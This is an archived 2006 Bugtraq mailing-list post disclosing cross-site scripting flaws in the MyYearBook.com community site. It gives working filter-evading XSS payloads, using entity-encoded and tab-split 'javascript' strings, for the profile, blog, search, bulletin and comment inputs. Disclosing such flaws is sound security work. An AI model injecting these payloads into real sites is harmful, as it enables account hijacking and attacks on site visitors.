lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060525232125.9137.qmail@securityfocus.com>
Date: 25 May 2006 23:21:25 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: MyYearBook.com - XSS


MyYearBook.com - Personal community site like myspace.com

Effected files:

Input forms of:

editing profile
posting a blog
search boxes
posting a bulletin
posting a comment

---------------------------

XSS Vulnerabilities proof of concept:

When editing your profile, it seems <script> tags are filtered to <notallowed> tags, and javascript is filtered to the word not allowed. To by pass this we can convert the script tags or the word javascript by using hex encoding. Below are following examples of places where user submitted data isn't properlly filtered before being dynamically generated.


Profile input:

All the user has to do is put the following in any input box in his profile: <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


Blog subject input:

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Photo caption input:

Same as above.
<IMG SRC="jav&#x09;ascript:alert('XSS');">


Any search box input:

"><IMG SRC="jav&#x09;ascript:alert('XSS');"><"

Posting a bulletin input:

In the message input box the following works:

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


Posting a comment:

<IMG SRC="jav	ascript:alert('XSS');">

Make sure tab is enabled.

------------------------------------------------

Luny - http://www.youfucktard.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ